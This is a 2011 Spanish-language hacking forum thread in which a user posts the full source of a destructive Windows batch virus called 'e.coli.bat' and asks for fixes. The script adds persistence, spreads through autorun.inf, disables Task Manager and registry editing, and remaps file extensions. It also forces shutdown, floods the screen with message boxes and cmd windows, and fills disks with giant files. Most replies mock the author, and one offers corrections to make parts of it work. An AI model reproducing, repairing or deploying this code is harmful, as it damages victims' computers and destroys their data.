elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  virus informatico llamado e.coli.bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: virus informatico llamado e.coli.bat  (Leído 4,239 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
virus informatico llamado e.coli.bat
« en: 12 Junio 2011, 17:44 pm »

sin ven errores en mi codigo por favor notificar

su amigo by hackerd W4rR3d

Código
  1. @echo off
  2. ::by hacked W4rR3d
  3. ::Comunidad Informatica Black Eye Security Team
  4. :: Piura - Perù
  5. Set ecoli=echo
  6. Set HC= C:\
  7. Set HD= D:\
  8. Set HE= E:\
  9. Set HF= F:\
  10. Set HG= G:\
  11. Set HH=copy /y %0
  12. taskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  13. tskkill  /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F
  14. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
  15. REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f
  16. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  18. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  19. if exist C:\ goto C1
  20. if not exist "C:\"goto t1
  21. :C1
  22. if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat&attrib +h +s +r C:\autorun.inf
  23. copy /y %0 C:\e.coli.bat
  24. %ecoli% [autorun] >>C:\autorun.inf
  25. %ecoli% OPEN=e.coli.bat >>C:\autorun.inf
  26. %ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf
  27. %ecoli% shell\open\Default=1 >>C:\autorun.inf
  28. %ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf
  29. attrib +h +s +r C:\e.coli.bat
  30. attrib +h +s +r C:\autorun.inf
  31. :t1
  32. if exist D:\ goto D1
  33. if not exist "D:\"goto t2
  34. :D1
  35. if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat&attrib +h +s +r D:\autorun.inf
  36. copy /y %0 D:\e.coli.bat
  37. %ecoli% [autorun] >>D:\autorun.inf
  38. %ecoli% OPEN=e.coli.bat >>D:\autorun.inf
  39. %ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf
  40. %ecoli% shell\open\Default=1 >>D:\autorun.inf
  41. %ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf
  42. attrib +h +s +r D:\e.coli.bat
  43. attrib +h +s +r D:\autorun.inf
  44. :t2
  45. if exist E:\ goto E1
  46. if not exist "E:\"goto t3
  47. :E1
  48. if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat&attrib +h +s +r E:\autorun.inf
  49. copy /y %0 E:\e.coli.bat
  50. %ecoli% [autorun] >>E:\autorun.inf
  51. %ecoli% OPEN=e.coli.bat >>E:\autorun.inf
  52. %ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf
  53. %ecoli% shell\open\Default=1 >>E:\autorun.inf
  54. %ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf
  55. attrib +h +s +r E:\e.coli.bat
  56. attrib +h +s +r E:\autorun.inf
  57. :T3
  58. if exist F:\ goto F1
  59. if not exist "F:\"goto t4
  60. :F1
  61. if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat&attrib +h +s +r F:\autorun.inf
  62. copy /y %0 F:\e.coli.bat
  63. %ecoli% [autorun] >>F:\autorun.inf
  64. %ecoli% OPEN=e.coli.bat >>F:\autorun.inf
  65. %ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf
  66. %ecoli% shell\open\Default=1 >>F:\autorun.inf
  67. %ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf
  68. attrib +h +s +r F:\e.coli.bat
  69. attrib +h +s +r F:\autorun.inf
  70. :T4
  71. if exist G:\ goto G1
  72. if not exist "G:\"goto open
  73. :G1
  74. if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat&attrib +h +s +r G:\autorun.inf
  75. copy /y %0 G:\e.coli.bat
  76. %ecoli% [autorun] >>G:\autorun.inf
  77. %ecoli% OPEN=e.coli.bat >>G:\autorun.inf
  78. %ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf
  79. %ecoli% shell\open\Default=1 >>G:\autorun.inf
  80. %ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf
  81. attrib +h +s +r G:\e.coli.bat
  82. attrib +h +s +r G:\autorun.inf
  83. :open
  84. if exist %HC%open.vbs goto cop
  85. %ecoli%On Error Resume Next >> %HC%open.vbs
  86. %ecoli%Set oWMP = CreateObject("WMPlayer.OCX.7")>> %HC%open.vbs
  87. %ecoli%Set colCDROMs = oWMP.cdromCollection>> %HC%open.vbs
  88. %ecoli%do>> %HC%open.vbs
  89. %ecoli%if colCDROMs.Count >= 1 then>> %HC%open.vbs
  90. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  91. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  92. %ecoli%Next>> %HC%open.vbs
  93. %ecoli%For i = 0 to colCDROMs.Count - 1>> %HC%open.vbs
  94. %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs
  95. %ecoli%Next>> %HC%open.vbs
  96. %ecoli%End If>> %HC%open.vbs
  97. %ecoli%wscript.sleep 5000>> %HC%open.vbs
  98. %ecoli%loop >> %HC%open.vbs
  99. start  %HC%open.vbs
  100. :cop
  101. if exist %HC%\apgar.vbs goto reini
  102. %HH% "%appdata%\e.coli_a.exe"
  103. %HH% "%windir%\e.coli_b.exe"
  104. %HH% "%systemroot%\system32\e.coli_c.exe"
  105. %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
  106. %HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
  107. %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
  108. %HH% "%programfiles%\Winamp\e.coli_f.exe"
  109. %HH% "%programfiles%\WinRAR\e.coli_g.exe"
  110. %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
  111. %HH% "%programfiles%\shARES\e.coli_i.exe"
  112. %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
  113. %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
  114. %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
  115. %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
  116. %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
  117. :reini
  118. if exist %HC%\Warning.vbs goto war
  119. %ecoli% On Error Resume Next >> %HC%\apgar.vbs
  120. %ecoli% set shell = CreateObject("WScript.Shell") >> %HC%\apgar.vbs
  121. %ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs
  122. start  %HC%\apgar.vbs
  123. :war
  124. if exist %HC%\cmds.bat goto cmds
  125. echo msn=msgbox("Warning Warning Warning",16," no me puedes vencer") >> %HC%\Warning.vbs
  126. For /L %%a IN (0,1,1000) DO  start %HC%\Warning.vbs
  127. :cmds
  128. if exist %windir%e.coli.bat goto wi
  129. :wi
  130. for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z) do if exist "%%A:\" copy /y %0 "%%A:\INFECTED!!!"
  131. for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html) do assoc .%%E=batfile
  132. for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe) do copy /y %0 "%windir%\%%I"
  133. attrib +h %windir%
  134. for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe) do tasklist /m | find /i "%%p" && taskkill /f /im %%p.exe
  135. echo fsutil file createnew %random%.exe 4000000000>>%windir%\fsutil.exe
  136. start %windir%\fsutil.exe
  137. if exist "%windir%\jpg.exe" (goto ves) else (goto Full Disk)
  138. copy /y %0 "%windir%\jpg.exe"
  139. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f
  140. :ves
  141. echo 00000000  000      000 0000000000 0000000000 0000000000 00000000000 0000000000 000000>>%userprofile%\Desktop\I.txt
  142. echo 00000000  0000     000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000>>%userprofile%\Desktop\N.txt
  143. echo   0000    00000    000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\F.txt
  144. echo   0000    000000   000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  145. echo   0000    000 000  000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\C.txt
  146. echo   0000    000  000 000 0000000000 0000000000 000            000     0000000000 000   000>>%userprofile%\Desktop\T.txt
  147. echo   0000    000   000000 000        000        000            000     000        000   000>>%userprofile%\Desktop\E.txt
  148. echo   0000    000    00000 000        000        000            000     000        000  0000>>%userprofile%\Desktop\D.txt
  149. echo 00000000  000     0000 000        0000000000 0000000000     000     0000000000 00000000>>%userprofile%\Desktop\!.txt
  150. echo 00000000  000      000 000        0000000000 0000000000     000     0000000000 000000>>%userprofile%\Desktop\!!.txt
  151. :Full Disk
  152. fsutil file createnew INFECTED!!!.exe 40000000000
  153. for %%t in (1,1,24) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000
  154. for /l %%e in (0,1,5000) do (start cmd)
  155. cls &exit
  156.  


« Última modificación: 16 Junio 2011, 17:22 pm por W4rR3d » En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #1 en: 12 Junio 2011, 17:48 pm »

Set ecoli=echo



Por dios........................


En línea

No he vuelto, solo estoy de paso.
FranciskoAsdf

Desconectado Desconectado

Mensajes: 231


Ni bueno, ni malo. Solo nada.


Ver Perfil WWW
Re: virus informatico llamado e.coli.bat
« Respuesta #2 en: 12 Junio 2011, 17:50 pm »

Lo mismo de siempre.
En línea

Asdf debería ser algún tipo de función.
bITEBUG

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #3 en: 15 Junio 2011, 05:36 am »

Que maldad por favor!
En línea

MrSilver

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #4 en: 17 Junio 2011, 14:50 pm »

Saludos:

No estoy muy puesto en codigo¿me podeis decir que hace exactamente el virus?
En línea

WaAYa HaCK

Desconectado Desconectado

Mensajes: 292


Arduino, Android and music


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #5 en: 17 Junio 2011, 17:41 pm »

Set ecoli=echo



Por dios........................

Pero... para qué cojones sirve esto???? Si es más fácil escribir echo !
Demonios... pero si ahora casi todos los AV detectan los Autorun!
En línea

La cacatúa yoyó es nueva en el zoo!
ShotgunLogic

Desconectado Desconectado

Mensajes: 233


Claws so razor sharp


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #6 en: 17 Junio 2011, 17:51 pm »

Esto pasa por meterse tanto pepino...XD
En línea

The clans are marching against the law, bagpipers play the tunes of war, death or glory I will find, rebellion on my mind.
Di~OsK


Desconectado Desconectado

Mensajes: 903



Ver Perfil WWW
Re: virus informatico llamado e.coli.bat
« Respuesta #7 en: 17 Junio 2011, 18:24 pm »

-10
En línea

Necesitas un servidor de TeamSpeak? Un certificado SSL? MANDA MP
Flamer


Desconectado Desconectado

Mensajes: 1.036


crack, crack y mas crack...


Ver Perfil WWW
Re: virus informatico llamado e.coli.bat
« Respuesta #8 en: 17 Junio 2011, 18:47 pm »

Código:
%HH% "%windir%\e.coli_b.exe"
%HH% "%systemroot%\system32\e.coli_c.exe"
%HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe"
%HH% "%programfiles%\Internet Explorer\e.coli_e.exe"
%HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe"
%HH% "%programfiles%\Winamp\e.coli_f.exe"
%HH% "%programfiles%\WinRAR\e.coli_g.exe"
%HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe"
%HH% "%programfiles%\shARES\e.coli_i.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe"
%HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe"
%HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
hola si no tienes privilegios de administrador esto no te funciona
ni esto
Código:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f
y pienso que esta linea te marcaria error
Código:
%HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe"
lo tendrias que poner asi
Código:
%HH% "%userprofile%\Mis documentos\e.coli_n.exe"
y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c:
En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus informatico llamado e.coli.bat
« Respuesta #9 en: 17 Junio 2011, 20:28 pm »

no se porque le ayudais, si este tipo nunca corrije nada, antes de pararse a corregir un batch, ya está haciendo otro batch con más errores que el anterior.

Como ya han dicho, lo mismo de siempre...

Por cierto, la mitad del código se puede reducir a un FOR para buscar unidades.

Saludos
En línea

No he vuelto, solo estoy de paso.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
virus informatico dengue.bat
Scripting
W4rR3d 4 3,867 Último mensaje 8 Febrero 2011, 22:32 pm
por leogtz
[BATCH] virus informatico fiebre.exe « 1 2 3 »
Scripting
W4rR3d 23 10,718 Último mensaje 18 Octubre 2011, 03:17 am
por Sorke
virus informatico msn.exe « 1 2 »
Scripting
W4rR3d 10 5,319 Último mensaje 21 Febrero 2011, 01:40 am
por ace332
virus informatico taskmgr.bat
Scripting
W4rR3d 4 3,624 Último mensaje 26 Marzo 2011, 13:13 pm
por FranciskoAsdf
La Policía desmiente el bulo del paracetamol que tiene un virus llamado Machupo
Noticias
wolfbcn 0 885 Último mensaje 22 Junio 2017, 21:52 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines